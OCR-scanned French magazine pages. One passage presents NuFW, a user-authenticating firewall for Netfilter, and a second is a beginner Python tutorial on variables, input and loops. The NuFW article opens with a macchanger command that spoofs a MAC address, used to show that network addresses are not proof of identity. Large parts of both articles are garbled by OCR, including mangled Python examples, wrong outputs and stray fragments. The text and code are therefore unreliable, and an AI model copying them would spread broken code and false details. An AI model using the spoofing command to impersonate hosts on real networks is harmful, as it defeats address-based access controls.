MAC du réseau, il suffit ensuite 
d'utiliser un logiciel comme mac- 
changer 

(http://www.alobbs.com/macchanger) 


Une commande suffit alors pour 
avoir la même adresse MAC : 

# macchanger -- 
mac#01423:45:67:89:AB ethl 
Cürrent MAC: 
00:40:96:43:87:65:{[wireless] 
(Cisco/Aironet: 48007340) 

Faked MAC: 

01:23:45:67:89:ab (unknown) 
C'est certes difficile de voler une 
adresse MAC à chaud puisque les 
équipements. réseaux vont se 
poser des quéstions en voyant 
deux: machines avec la même 
adresse MAC mais cela montre 
que ni l'IP ni l'adresse MAC ne peu- 
vent être considérées comme un 


| critère d'authentification. 


De plus, même si l'on considère 
que ces méthodes sont admissi- 
bles, elles ne permettent pas d'au- 
thentifier des utilisateurs qui se 
connectent sur la même machine. 
En effet, dans ce cas, la permission 
d'un utilisateur peut être la somme 
des permissions des utilisateurs 
loggués sur la machine. 

Il était donc nécessaire de trouver 
une nouvelle méthode permettant 
de résoudre ces problèmes. 


NuFW : authentification 
a posteriori 

Algorithme 

Le principe de fonctionnement est 
simple : lorsque une connexion 


doit être authentifiée, le pare-feu 27 
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Netfilter délègue la décision à | prend pas de décision à propos de 


NuFW et celui-ci demande aux uti- 
lisateurs d'indiquer le trafic qu'ils 
ont généré. NuFW établit alors les 
concordances entre les différentes 
sources d'informations et transmet 
la décision requise à Netfilter. 
Détaillons maintenant l'algorithme 
tel que décrit dans la figure sui- 
vante. 


Serveur d'authentification 


Hinuarh} 


. 
De 


tape 7 


cette connexion. 

4, Le démon nufw se contente de 
relayer le paquet reçu vers le ser- 
veur d'authentification, qui a auto- 
rité sur les décisions. 

5. Le démon nuauth analyse le 
paquet reçu (et en particulier 
l'adresse IP source) et envoie une 
demande de mise à jour à tous les 
clients connectés (par 
l'étape 1) depuis cette 
adresse pour qu'ils 
authentifient les 
connexions en attente. 
Cette demande est 


Basé TACLE 
lplaintext, Idép, ..:) 


Acradire des 


utilsateurs 
Hidsp, AD, Rédhys, 1 


envoyée au travers du 
(ou des) canal (canaux) 





1. Au démarrage de sa session de 
travail, l'utilisateur lance un client 
sur son poste de travail. Le client 
ouvre un tunnel crypté par TLS 
vers le serveur nuauth qui réalise 
l'authentification de l'utilisateur 
pour ce tunnel au regard d'un 
annuaire référent. Ce tunnel est 
ensuite conservé pendant toute la 
durée des opérations et l'ensemble 
des échanges entre nuauth et le 
client se fait ensuite par son inter- 
médiaire. 

2. Supposons maintenant que l'uti- 
lisateur ouvre une connexion vers 
un serveur, par exemple une 
connexion web à destination du 
serveur d'application. Il utilise alors 
son navigateur favori qui envoie un 
paquet à destination du serveur. Le 
paquet envoyé est un paquet TCP 
standard avec notamment comme 
caractéristiques port destination 
80 (web) et bit SYN positionné 
(ouverture de connexion). 

3. Le pare-feu (Netfilter) envoie ce 
paquet au démon nufw (au moyen 
de la décision QUEUE ou 
NFQUEUE) : contrairement à un 
pare-feu "classique", Netfilter ne 


crypté(s) ouvert(s) à 
l'étape |. 

6. Le client qui a ouvert 
notre connexion 
"témoin" stipule à 
nuauth qu'il l'a fait, en 
précisant tous les paramètres IP (IP 
et port destination, port source, 
etc.) À ce stade le serveur nuauth 
connaît de manière sûre l'identité 
de l'utilisateur à la source de notre 
connexion. 

7. Nuauth réalise une requête sur 
la base des ACLs pour vérifier si 
l'utilisateur dispose des droits pour 
établir cette connexion. Nuauth 
obtient ainsi une décision. 

8. (En option) nuauth journalise 
toutes les informations relatives à 
cette connexion dans une base 
SQL, avec bien sûr l'identité de 
l'utilisateur. 

9. Nuauth envoie la décision obte- 
nue en 7.à nufw, qui la relaie à son 
tour à Netfilter. La décision asso- 
ciée à notre utilisateur, est alors 
appliquée par Netfilter. 

10. S'il est autorisé, le paquet 
poursuit sa route. 

11. (En option) Si le serveur 
(Apache, par exemple) désire 
connaître l'identité de l'utilisateur, 
au lieu de la lui demander directe- 
ment, il peut réaliser une simple 
requête SQL SELECT pour récu- 
pérer l'identifiant de l'utilisateur en 


partant de marqueurs uniques de la 


connexion (la socket source, pour 
les connaisseurs). L'utilisateur est 
ainsi authentifié de manière trans- 
parente, et sans pouvoir tricher, sur 
le serveur : il s'agit d'une solution 
de Single Sign On (authentification 
unique) très simple, très sûre, et 
indépendante du protocole. 

12. Le reste du flux est géré par le 
suivi de connexion (Stateful inspec- 
tion) de Netfilter : les paquets ne 
repassent pas par les démons 
nufw/nuauth. 

Cette algorithme effectue donc 
une authentification à posteriori, 
connexion par connexion. 


Nufw 

Responsable de l'interaction avec 
le noyau Linux, le démon nufw est 
minimaliste. Déployable sur tout 
type de machines, il a peu de 
dépendances logicielles et de très 
faibles exigences en terme de 
mémoire. Cela permet de le 
déployer facilement sur des boi- 
tiers légers comme par exemple 
certaines bornes WiFi. 


Nuauth 

Nuauth est le cœur de NuFW. Il 
est en charge de la prise de déci- 
sion, de la réception des messages 
clients, de la collaboration avec les 
serveurs nufw et de la journalisa- 
tion. Pour mener à bien toutes ces 
tâches, son architecture repose sur 
les threads et la modularité. Toutes 
les interactions avec l'extérieur se 
font par le biais de modules et l'uti- 
lisation de pool de threads est 
massive de manière à profiter faci- 
lement des machines multiproces- 
seurs. 

Un seul serveur Nuauth est capa- 
ble de collaborer avec plusieurs 
serveurs nufw et une architecture 
distribuée est donc réalisable. Ceci 
peut particulièrement être intéres- 
sant dans le cas d'une structure 
multi-site : les utilisateurs voient 
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alors leurs permissions les suivre 
quelque soit le site où ils se 
connectent. 

L'authentification peut être réali- 
sée grâce à plusieurs modules. Le 
plus intéressant est sans doute le 
module “system” qui interroge 
PAM et utilise les groupes systè- 
mes. En profitant de la puissance de 
PAM, il est possible de s'authenti- 
fier avec des méthodes très variées 
(annuaire, LDAP Active Directory, 
Radius...). 

Le stockage des ACLSs doit se faire 
au niveau de NuFW puisque les 
informations complémentaires ne 
peuvent être contenues dans les 
règles Iptables. Deux modules sont 
disponibles, un module plaintext 
qui stocke les règles dans un fichier 
plat et un module LDAP qui utilise 
un annuaire pour conserver les 
informations. 


Clients 

Le protocole de NuFW repose sur 
l'utilisation d'un client par chaque 
utilisateur. Les systèmes d'exploita- 
tions supportés à ce jour sont : 

+ Linux 

+ FreeBSD 

+ MacOS X 

+ Windows | 
L'authentification peut se faire de 


manière transparente grâce à do] à 


méthodes propres à chaque sys- 


tème d'exploitation. L'ensemble |: 
des clients pour système libre est | 
distribué sous licence GPL et les |: 
clients pour système propriétaire |: 
sont disponibles sous licence com: 


merciale auprès d'INL. 


Quelques mots sur les | 
performances | 

Le principe de fonctionnement de 
NuFW peut paraître “lourd” par 


rapport à celui d'un pare-feu "clas: 
Plusieurs aspects sont à |. 


sique”. 
noter : 


+ NuFW s'appuie sur les capacités 
"Stateful Inspection" du suivi de. 
connexion de Netfilter (le fameux 


conntrack) : seul le paquet d'ouver- 







ture de connexion fait l'objet de la 
procédure décrite par l'algorithme. 
Tout le reste du flux d' une 
connexion est géré par Netfilter, 
exactement comme le fait un pare- 
feu "pur" Netfilter. Les flux réseaux 


standards (en vert sur le graphe) 
ne sont donc pris en charge par 
NuFW  qu' à l'initialisation de la 
connexion. 

+ L'une des phases les plus longues 
est la requête (Étape 7 sur notre 
schéma) dans la base d'ACLSs - typi- 
quement une base LDAP. Depuis la 
branche 0.9, le serveur d'authentifi- 
cation, nuauth, dispose d'un sys- 
tème de cache interne pour alléger 
ces flux. 

+ Seuls les flux dessinés en noir sur 
notre schéma sont exécutés au 
passage d'une nouvelle connexion. 
Les flux dessinés en bleu sont réa- 
lisés soit une seule fois (étape |), 
soit périodiquement (étape 7) 
grâce au système de cache. De 
plus, les étapes 8 et 1 | sont option- 
nelles. 

Nous avons procédé à des benchs 
sur différents systèmes. Des tests 
ont notamment été faits surtun 
système en production avec la 


| tonte. des: ip activées 
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(journalisation MySQL complète 
notamment). Ce système est 
constitué d'un pare-feu et d'un ser- 
veur d'authentification. Pour 1000 
connexions successives, la 
moyenne de temps de connexion à 
été de 15,2 ms. C'est beaucoup 
plus élevé que le temps de 
connexion moyen sur un système 
standard qui est de l'ordre de | ms 
mais il est important de noter 
qu'en valeur absolue cette diffé- 


rence de performance est imper:: 


ceptible pour l'être humain::Ges 
tests ont été faits sur un:LAN ; des 
ouvertures de connexion sur 


Internet (même!sans NuFW) pren: 


nent typiquement des durées 


d'échelle supérieures à ce facteur. Il 


n'y a donc pas d'impactien: terme. 


de qualité de service du point de. 


vue de l'utilisateur En pratique, le 


système tourne en production sur. 


des réseaux de plusieurs centaines 


d'utilisateurs, sans que ceux-ci ne: 


parsoiver de ralentissement. 
Extensions 


D nalisatite. 


L'un des'intérêts de M ihme de, 
 NuFW est qu'il fournit, pour cha: 
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que connexion, des données inté- 
ressantes. Outre les informations 
réseaux relatives à IP des informa- 
tions relatives à l'utilisateur sont 
disponibles : 

+ Nom de l'utilisateur 

+ ID numérique 

+ Système d'exploitation 

+ Application à l'origine de la 
connexion 

Nuauth fournit donc des moyens 
d'exporter ces données. Les modu- 
les disponibles sont : 

° syslog 

° mysql 

° pgsql 

+ prelude 

Les journaux stockés dans la base 
MySQL sont exploitables par l'in- 
terface Nulog 
(http;//software.inl.fr/trac/trac.cgi/ 
wiki/Eden Wall/NuLog). 


Une autre capacité intéressante de 
la journalisation est le suivi des ses- 
sions utilisateurs puisqu'il permet 
de savoir qui est connecté à un 
moment donné. Une autre possibi- 
lité d'exploitation peut se faire par 


le module script qui permet de lan- 


cer un script à la connexion et à la 
déconnexion des utilisateurs. Ceci 
permet par exemple d'implémen- 
ter un système de portail captif. 


Single Sign On 
NuFW permet d'identifier les utili- 
sateurs des a D À réseau, de 
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manière simple, par Single Sign On. 


Les modules de journalisation SQL 
maintiennent en temps réel une 
table des connexions associant 


connexion et utilisateur. 
Par exemple, pour TCP ou UDP 


une connexion d'un utilisateur est 
identifiée de manière sûre, en par- 
tant des 5 paramètres suivants : 
adresse |P source, adresse IP desti- 
nation, port source, port destina- 
tion, marqueur de temps. (Le lec- 
teur averti a déja noté la possible 
omission de l'adresse et du port 
une 
requête sur la base SQL de NuFW 


destination). Ainsi, faire 


portant sur ces paramètres 


conduit à une identification fiable 
la source de la 


de l'utilisateur à 
connexion. Par conséquent, toute 
application réseau qui doit identi- 
fier un utilisateur est capable de 


déterminer l'identité de ce dernier 


en interrogeant le système de suivi 
de connexions de NuFW 

Ce fonctionnement est facilement 
extensible à toute application 
réseau client/serveur et garantit 
une identification stricte, transpa- 
rente et sécurisée des utilisateurs. 

À l'heure de l'écriture de cet arti- 
cle, des modules SSO NuFW sont 
fonctionnels pour Apache, et pour 
Squid, et illustrent la validité de ce 
principe. En terme de performan- 
ces, nos tests - réalisés avec AB 
(Apache Bench)- montrent que le 
fonctionnement de NuFW en 


mode Single Sign On à un impact 
non perceptible par l'utilisateur. 


Qualité de service 

et routage 

NuFW est capable de marquer 
chaque paquet d'une connexion 
avec l'identifiant de son utilisateur, 
et donc d'appliquer une politique 
de qualité de service spécifique à 
chaque utilisateur. || est ainsi possi- 
ble d'attribuer à un utilisateur une 
certaine bande passante globale ou 
encore de choisir le lien de sortie 
sur internet en fonction de son 
identité 

En résumé, NuFW sait attribuer 
très finement la bande passante et 
la priorité du trafic réseau, par uti- 
lisateur et par protocole et ceci 
même sur les machines multi-utili- 
sateurs. 


Règles horaires 

NuFW offre aussi la possibilité de 
créer des règles horaires strictes. || 
est possible de décider sur les flux 
authentifiés qu'une connexion peut 
avoir lieu entre deux moments 
donnés. Dans ce cas, elle est auto- 
matiquement détruite à la fin de la 
période de temps. La période peut 
aussi être une durée et il est donc 
possible de limiter la durée de cer- 
taines connexions à un temps fixe. 
On peut ainsi limiter la durée de 
vie des connexions HTTP par 
exemple 30 secondes pour empê- 
cher l'établissement de tunnel per- 
sistant. 


Nuface : interface de 
configuration des règles 
Nuface est une interface web de 
gestion de pare-feu. Écrite pour 
NuFW, mais utilisable sur un pare- 
feu "standard" Netfilter, Nuface uti- 
lise une modélisation XML de haut 
niveau pour représenter les objets 
réseaux, les utilisateurs, les proto- 
coles... et permet d'agglomérer ces 
objets en ACL. 
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L'un des intérêts de Nuface est la 
possibilité de construire des objets 
par union ou intersection d'objets 
et ce, de manière récursive, puis- 
que un système de liens est dispo- 
nible pour inclure des objets dans 
d'autres objets. Une fois ces objets 
complexes construits la mise en 
place des ACLSs est alors facile. 
Pyctd : suivi des connexions 
NuFW maintient en temps réel 
une liste des connexions authenti- 
fiées dans la base SQL. Il fournit en 
cela des informations semblables à 
ce que permet de remonter la nou- 
velle API de  netfilter  : 
libnetfilter_conntrack. Cette 
bibliothèque apparue avec Linux: 
2.6.14 offre la possibilité de lister. 
et modifier le suivi de connexions 
de Netfilter. L'utilitaire pyctd 
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(http://software.inl.fr/trac/trac.cgi/ 
wiki/pyctd) développé par INL per- 
met d'interroger Netfilter pour 
remonter ses informations qui sont 


alors affichées par une interface 


web : | 

Elle présente la liste 
connexions enrichies parles don- 
nées fournies par NuFW. On 
retrouve donc les:informations uti- 
lisateurs sur toutes les connexions 
authentifiées.! L'interface ne se 
contente pas’ de l'affichage mais 
permet aussi de modifier la table 


de connexions. Les fonctions sui-. 


vantes sont disponibles : 


r Modification du timéstamp d'une 
connexion: (et donc fixer sa date 
d'expiration, on. eue fermer une 


connexion à: 18h). 


. Modification de la marque d' ya 
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connexion (et donc changer sa 
qualité de service) 

+ Destruction d' une connexion 
donnée 

Il est donc possible de supprimer 
les connexions suspectes en toute 
transparence. On peut ainsi inter- 
rompre à tout moment un télé- 
chargement qui pose problème ou 
encore le ranger dans une classe 
de qualité de service lui donnant 
seulement quelques kilo octets de 
bande passante. 

Pyctd est composé de deux bri- 
ques : 


 Backend XML-RPC en pythefffi 


exporte les actions et.les'informa- 


tions sur une machine distante 


+ Frontend en:PHP : il récupère lès: 
informations du backend et les met 


Nouveautés 
de la version ‘2,2 


La version 2.2 de NuFW deÿrait AR te 
voir le jour courant mars.Elle com. 1 


porte d' importantes. améliorations 
tant sur le point dé vue: strücturel 


à-disposition de l'utilisateur, ÉRRNRRE d 


THETRLITILETI 


que sur le point. de vue a Ë 


améliorations stueturoes | 


Support d' IPVG PHEU 
L'une des plus. importantes nel | 
rations . est le support! d'IPV6. 
Depuis le. noÿau. 2:6.18; Netfilter 
supporte lé suivi d'état sur d'IPvé, 
| ce qui a permis d'envisager le déve- 
| loppement du filtrage IPV6 dans 
NuFW 


Le protocole de NuFW 22 et 
nuauth utilisent maintenant des 
structures IPv6 pour le stockage et 
le transfert des informations sur 
les paquets à authentifier. 


Compatibilité 
ascendante 

Comme nous venons de le voir, le 
protocole de NuFW 2.2 a beau- 
coup évolué. Une compatibilité 
ascendante a donc été mise en 
place pour permettre aux utilisa- 
teurs de clients en version 2.0 de 
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communiquer avec un serveur 
nuauth 2.2, 

La compatibilité d'un nufw 2.0 avec 
un serveur nuauth 2.2 est elle aussi 
gérée. 


Multiplication des hooks 
La modularité de nuauth est assu- 
rée par des hooks sur lesquels on 
peut brancher des modules. Ceux- 
ci ont été étendus de manière à 
augmenter la flexibilité du compor- 
tement de nuauth. Ainsi, on peut 
signaler deux nouvelles interac- 
tions possibles : 
* Fixer les propriétés des utilisa- 
teurs après la phase d'authentifica- 
tion | 

+ Modifier un paquet après la prise 
de décision et avant l'envoi des 
données au serveur nufw 

Le premier permet de changer les 
propriétés d'une session utilisateur 
en fixant par exemple la durée de 
la session (temps avant lequel une 
réauthentification est demandée). 
Le second offre des possibilités 
intéressantes comme la définition 
de politique avancée de marquage 
de paquets. 


Améliorations fonctionnelles 

Les améliorations sont le plus sou- 
vent des optimisations permettant 
de “tuner” finement NuFW, mais 
des nouveautés fonctionnelles 
importantes sont aussi à l'ordre du 
jour. 

Integration d' un mode de com- 
mande dans nuauth 

Il est maintenant possible d'inter- 
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roger et 
d'agir sur 
nuauth par le 
biais d'un 
socket Unix. 
Au :  pro- 
gramme, 
quelques 
commandes 
permettant à 
l'administra- 
teur de gérer 
finement les 
utilisateurs. 

Il est possible de lister les utilisa- 
teurs connectés au serveur, de for- 
cer une déconnexion pour un utili- 
sateur ou pour l'ensemble des uti- 
lisateurs. La déconnexion est inté- 


ressante puisqu'elle permet de for- 
puisq P 


cer une synchronisation de la liste 
des groupes d'un utilisateur. En 
effet, celle-ci est récupérée à la 
connexion et ne peux être rafrai- 
chie sans passer par une décon- 
nexion. 

Pour l'instant, seul un script 
python, “command.py”, est disponi- 
ble mais des outils de gestions plus 
avancées devraient bientôt voir le 
jour. 


Gestion avancée 

de la marque 

L'ajout du hook de modification du 
paquet a permis de développer un 
module permettant d'attribuer une 
marque au paquet suivant le 
groupe auquel appartient l'utilisa- 
teur. Les modules mark _ group 
peuvent être chaînés ce qui permet 
de composer des mar- 
ques complexes. 

Le schéma précédent 
illustre une politique 
de marquage avancée : 
°Le premier bit si 
positionné à | déclen- 
che le passage du 
paquet vers le proxy. 
S'il est mis à 0, alors le 
paquet sort directe- 
ment sur internet. 
Les 15 bits suivants 








identifiant de l'utilisateur 


Groupe de qualité de service 


Passage par le proxy 


stockent une marque indiquant 
dans quel classe de qualité de ser- 
vice il faut ranger le paquet. 

Les 16 derniers bits sont consa- 
crés au stockage de l'identifiant de 
l'utilisateur et ils sont utilisables 
par des applications tierces pour 
repérer l'utilisateur. 

Cette politique est mise en place 
simplement en chaînant 2 modules 
mark_group et un module 
mark_userid. Le premier module 
mark_group vérifie si l'utilisateur 
appartient au groupe proxy et met 
le premier bit de la marque à | si 
c'est le cas. Le second module met 
en place une politique de QosS sur 
les 15 bits suivants et enfin le 
module mark _userid stocke l'iden- 
tifiant numérique de l'utilisateur 
dans les 16 derniers bits. 


Conclusion 

Grâce à NuFW, il est possible pour 
la première fois d'utiliser des règles 
en fonction des utilisateurs en 
toute confiance. Ses extensions 
offrent un suivi poussé de l'activité 
des utilisateurs et des fonctionnali- 
tés avancées d'authentification uni- 
que. Utilisé avec les outils de rou- 


tage et de qualité de service, c'est 


l'ensemble de la couche réseau de 

Linux qui profite de la notion d'uti- 
lisateur. 

ERIe LEBLOND 

http://www.inl.fr 





PYTHON à 


Perl ou python ? C'est une question 
que l'on retrouve souvent dans les 
forum. Je dirais peu importe, ce 
qu'il faut c'est s'approprier un 
langage de programmation qui per- 
mette en peu de temps de nous eff 
fabriquer des outils personnalisés. 27 
Mais nous allons quand même 
essayer de vous convaincre que 
python est le must de la 
programmation. 4 


Tu connais Eric ? 

On peux utiliser un éditeur éditeur 
quelconque pour écrire des: 
scripts comme vim, nano, kate... 
Vous pouvez aussi tester eric. Ne 


copain! chimiste, en..lui!faisant les 
:yeux:doux.pout tenter de le tester. 
eric est un environnement graphi- 
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vous rétournez pas sur eric, votre 


que de DORA Rn (apt-get 











install éricremerge lc). 


Il existe aussi diverses autres envi- 


ronnements de programmation tel 
que drpython 

Mais vous pouvez utiliser python 
en ligne dé commande afin de tes- 
ter vos scripts, pour cela c'est sim- 
ple;tapez python dans une console. 


Jouons un peu 


avec Python 


Vous pouVez maintenant! lancer 


python en ligne de.commandes. 


[FaSm:/home/fasm]#python 


Python 218,50(#2, Sep 4 


2006,22#01:42) 

[SEC 3.3.5 (Debian 1:3.3,5- 
13)] on linux2 

Type "help", "copyright", 
"credits" or "license" for 
more information. 

>>> 

On peut, en ligne de commandes, 
commencer à découvrir certaines 
choses : 

>> 1 +1 

2 


En mode console, on peut effec- 
tuer différentes actions telles que 
des calculs. Vous pouvez + 
toutes les opérations (+, -, *,/ 

Les espaces entre les ae et 
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DrPython -/home/daniel/bin/drpy/drpython:py 
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wx.Frame.._ init (self, parent, id, title, wx.DefaultPosition, wx.Sizel 
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x = Û 


Fons 2 5 CU ONCE 


PAPE eythan > 
(#2, Aug 19 2 
(Mandrake linux 
copyright" 


(Line: 90, Col: 22 UNIX "| 


Editeur drpython. 


les symboles sont optionnels. 
>>> 7+3%4 

19 

>>> (7+3)*4 

40 


Vous pouvez remarquer ici, que la 
priorité des opérations est respec- 
tée. 

>>> X = ]! 


«4 |} ha e 5 AE i} 
“credits” c Eficenee) Fo 


>| on linux? 


MOTTE 


>>> Y = 2 
>>> X + Y 
3 


Dans les trois lignes précédentes, 
nous avons affecté à X la valeur | 
et la valeur 2 à Y. Puis nous effec- 
tuons l'opération X + Y qui donne 
3. 

Nous n'avons pas défini de type 
pour X et Ÿ comme dans les autres 


x De vous avez ‘',2,' ans 


intormat ion. 


eZ 
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langages! Pas besoin, python se 
débrouille seul. 

>>> X=1 

>>> type(X) 

<type ‘int'> 


Si vous utilisez type() vous pouvez 
voir que X est un int (entier) 
essayons d'affecter une chaîne de 
caractères à X : 

>>> X ='bonjour le monde’ 

>>> print X 

bonjour le monde 

>>> type(X) 

<type ‘str'> 


On peut donc affecter à X n'im- 
porte quel type, python s'en 
arrange. 

Nous venons d'effectuer par la 
même occasion notre premier affi- 





chage en utilisant l'instruction 
print. Cette instruction n'affiche 
strictement que la valeur de la 
variable, telle qu'elle a été encodée. 
Essayons quelques autres lignes : 
>>> X,Y,Z='tout le 
monde','bonjour', 1 

>>> type(X) 

<type ‘str'> 

>>> type(Y) 

<type ‘'str'> 

>>> type(2) 

<type ‘int'> 

>>> print "nous sommes 
le",2,Y,Xx 

nous sommes le 1 bonjour tout 
le monde 


Nous venons d'affecter, sur la 
même ligne, à X la valeur ‘tout le 
monde’, à Ÿ la valeur 'bonjour' et à 
Z la valeur |. 

Vous pouvez remarquer que X,Y et 
Z n'ont pas le même type. 

A l'aide de la commande print, on 
peut afficher ces variables dans 
l'ordre que l'on veut et donc obte- 
nir la phrase de la dernière ligne. 
Nous savons maintenant déclarer 
des variables (il n'y a rien à faire ici 
-) ) , calculer avec python, afficher 
des phrases à l'écran. 

Essayons de donner de l'impor- 
tance à l'utilisateur d'un pro- 
gramme en lui permettant d'entrer 
des informations. 


Parler à Python 
L'inter-activité d'un programme est 
importante. 

Python nous offre deux instruc- 
tions input() et raw_input().Voyons 
un peu leur utilité. Observez les 
lignes suivantes : 

>>> x= input() 

1 

>>> print x 

1 


En écrivant x=input(), vous invitez 
l'utilisateur à entrer une valeur au 


clavier. Sur la deuxième ligne vous. 


voyez que j'ai entré |. 
je demande ensuite d'afficher la 


1: FaSm:-]$ 


valeur de x. 

On pourrait faire une demande én 
même temps : 

>>> x=input('entrez une 
valeur\n') 

entrez une valeur 

1 


Dans les parenthèses, j'entre une 
phrase qui indique ce que je veux 
comme valeur, le \n me permet de 
faire un retour à la ligne avant d'en- 
trer une valeur. 

La fonction input() renvoie une 
valeur dont le type correspond à 
ce que l'utilisateur à entré. 

Cela peut poser des problèmes si 
l'on ne fait pas une vérification 
automatique du type réel entré par 
rapport au type attendu. 

C'est pour cette raison que.je pré- 
fère utiliser d'instruction 
raw_input(), instruction qui ren- 
voie toujours une Chaîne de carac- 
tères. Vous pouvez ensuite conver- 
tir cette chaîne en nombre à l'aide 
de int() ou'float(). 

>>> x # raw input('entrez une 
valeur": ") 

entrez, une valeur 
>>>AY = 12 

>>> z=int(x) * 12 h 
>>> print vous avez entré la! 
valeur ',x | | 
vous avez entré la valeur 245 
>>> print ‘la réponse est :!, 
à | 
la réponse est 


:245 


2940 
La chaîne de caractères entrée 
dans x, est transformée en int avant 


d'être multipliée par 12. 


Notre premier script 


en Python 


Écrivez ce script et enregistrez-le 
sous script.py par exemple. 
Rendez-le exécutable (chmod u+x 
script.py sous linux). 

Vous pouvez maintenant lancer le 
script en ligne de commande : 
./script.py 


Vous pouvez le lancer de la sorte 
parce que la ligne #!/usr/bin/env 
python est incluse dans le script à 
la première ligne. 

Si vous ne mettez pas cette ligne, 
vous devrez taper : 

[ FaSm:-]$ python script.py 


Si vous souhaitez afficher à l'écran 
des caractères spéciaux avec un 
print, tel que le chemin vers une 
application, un print « normal » 
ne suffit pas. Voici le moyen de le 
réaliser: 


>>> path='C:\quelquépart' . 
>>> path | 
'C:\\quélquepart ' 

>>>Wprint r'C: \quelqueparti}: 
C: \quelquepart 
>> 


Nous voyons aan ici le rôle de r 


après le print, Avec lui, on, n'est. 
plus obligé d'échapper les \ par 
exemple: :: | 


Conclusion : 

Voilà, Les bases sont posées, nous 
savons. écrire un script, le lancer, 
écrire des. messages à l'écran, 


demander et gérer des informa-. 


tions entrées au clavier. Mais nous 
n'en sommes qu'aux balbutie- 
ments, beaucoup de choses res- 
tent à apprendre. 
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Les boucles sont très 
importantes quelque 
soit le langage de pro- 
grammation. Que ce 
soit pour tester une 
condition ou pour 
répéter une action, 
elles forment un 
aspect fondamental 
qu'il est essentiel de 
maîtriser. 


prendre à | | 
Progranimer 
AC AUETO)S 





Livre Gérard Swinnen. 


Les structures 
conditionnelles 

Les boucles ou autres structures 
itératives sont des structures de 
contrôle. En effet, en leur absence, 
les instructions sont exécutées les 
unes à la suite des autres, dans l'or- 
dre dans lequel elles ont été écri- 
tes. Les structures de contrôle 
modifient le flux du programme, le 
chemin que suit Python pour lire et 
exécuter le programme. 

Dès lors que l'on rencontre une 
boucle ou une condition, les 
actions qui s'en suivront dépen- 
dront du résultat de celle-ci. 

Dans un programme quelconque, il 
est très fréquent de vouloir tester 
une condition. En fonction du 
résultat on affichera ou effectuera 
une action bien précise. Cela peut 
dépendre de la valeur d'une varia- 
ble après une série d'instructions 
déjà réalisées auparavant, de la 
valeur d'une entrée que l'utilisateur 
aura donnée, ou de bien d'autre 
chose. En outre on aiguille le pro- 
gramme de façon précise selon les 
circonstances. 

Il faut comprendre par là que 
même si toutes les instructions 
peuvent potentiellement être exé- 
cutées, le programme peut très 
bien ne jamais accéder à une partie 
du code qui se trouverait dans un 
bloc dont l'accès serait défini par 
une condition jamais satisfaite. 

Le principe est simple et fonc- 
tionne comme ceci : 

Si (condition 1) alors faire action! 
Sinon si (condition2) alors faire 
action2 

Sinon si (condition3) alors faire 





action3 


Sinon faire actionN. 
Comment traduire cela en Python ? 
La syntaxe est simple et très trans- 
parente. Les mots clefs « if », « 
elif » et « else » traduisent res- 
pectivement « si », « sinon si », 
et l'alternative « sinon ». 
Exemple : 
#! /usr/bin/python 
a = 50 
LÉra/<t50%? 

print « a est plus 
petit que 50 » 
elif a == 50 : 

print « a vaut 50 » 
else : 

print « a est plus 
grand que 50 » 


Il est très facile de comprendre ce 
test concernant la valeur de « a ». 
Ici la réponse serait bien sûr « a 
vaut 50 », et on peut très bien ima- 
giner.réaliser ce test sur une valeur 
entrée par l'utilisateur. 

Notons tout de suite quelques 
points très importants. 

Dans d'autres langages, les structu- 
res sont délimitées par des carac- 
tères ou des chaînes de caractères. 
Généralement ce sont des accola- 
des ou encore des « begin » … « 
end » qui encadrent le bloc d'ins- 
tructions. Ici vous remarquez que 
nous n'avons rien mis de cela. En 
effet, c'est grâce à l'indentation des 
instructions que Python comprend 
qu'il s'agit d'un bloc d'instructions 
et donc il est impératif de réaliser 
cette indentation. Dès que le texte 
n'est plus indenté, Python sort de 
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la plus petite boucle englobante. 
De même, ce sont les deux points 
« : » qui remplacent le « then » 
que l'on peut parfois trouver, tra- 
duisant le « alors ». Ils sont évi- 
demment indispensables et précè- 
dent l'indentation. 

Concernant les conditions, elles 
peuvent être entourées de paren- 
thèses ou non, celles-ci ne sont pas 
obligatoires mais permettent par- 
fois d'améliorer la lisibilité. 

Une dernière note : les « elif » 
(sinon si...) sont optionnels, et peu- 
vent être mis en nombre illimité. 


Les structures 
itératives 

Les structures itératives (ou répé- 
titives) permettent comme leur 
nom l'indique de répéter une ins- 
truction ou une suite d'instructions 
pour un certain nombre de fois (« 
for. ») ou tant qu'une condition 
est satisfaite (« while. »). 
L'instruction la plus fréquente est 
le « while », structure énormé- 
ment utilisée en Python. 
Algorithmiquement, cette boucle 


traduit « Tant que (condo 


alors faire. ». 

Le programme rentre donc dans le 
boucle et teste la condition. Si au: 
premier passage » celle-ci n'est 
pas vérifiée, on continue le pro- 
gramme après la boucle, les ins- 
tructions qui s'y trouvent ne sont 
pas exécutées. 

Si la condition est satisfaite une 
fois, on exécute le bloc d'instruc- 
tions, puis on retourne au début. 
On retente la condition, ét de 





même, si elle est satisfaite, on exé- 
cute le bloc d'instructions, et on 
retourne au test de la condition... 
Comme vous le comprenez il y a là 
un gros risque : la boucle infinie ! Il 
faut que dans le bloc d'instructions 
change impérativement la valeur de 
la condition pour qu'à un moment 
ou un autre, celle-ci ne soit plus 
satisfaite, sinon on n'en sort jamais: 
La syntaxe quant à elle, une:fois de 
plus est élémentaire ::1! 
while (condition) : 

instruction 


La condition portera sur un indice, 
ou plusieurs. 
Pour reprendre notre problème de 
boucle infinie, prenons un exemple 
typique simple : | 
#! :/usr/bin/python 
1-# 5 | 
JBÉG Hs 
while (i<j) BA | | 

print ‘Ceci égt” une 
boucle FÉES 

ie 

J= j+1 | 
print ‘Ce HEAASe ne sera 
jamais affiché 


j . D #2 10 4e 2 
Les | e Ua alteu F£ Q | “a & 


L'égalité 
rieur ou égal 
supérieur où égal 
inférieur 
supérieur 


ou SANS diff: érent 





lci on modifie bien dans le bloc 
d'instructions les valeurs de i et j 
étant à la base de la condition, mais 
ces deux indices étant incrémentés 
de façon systématique tous les 
deux à chaque passage, on n'en finit 
jamais. 

Plusieurs solutions : ne pas incré- 
menter les deux indices, incrémen- 
ter un indice d'un pas plus grand 
que l'autre, ou rajouter une 
seconde condition, par exemple en 
modifiant : while (i<j) or (j<=10). 
L'indice j étant incrémenté chaque: 
fois, il arrivera un moment: où il 
vaudra 10, ça sera la défhière fois 
que la condition.séra satisfaite. 
Une autre structure répétitive est. 


la boucle & pour ». Celle-ci ést un 
peu différente de celle que l'on 


peut trouver dans d'autres langages. 


‘comme le C ouile Pascal, où un 


bloc.d'instructions est exécuté 
selon un indice dont la valeur est: 
comprise entre quelque chose et È 
autre chose. | 
Celle-ci traduit en Python le 4 ñ 
que pour un indice prenant: des 

valeurs données, on fait un certain 
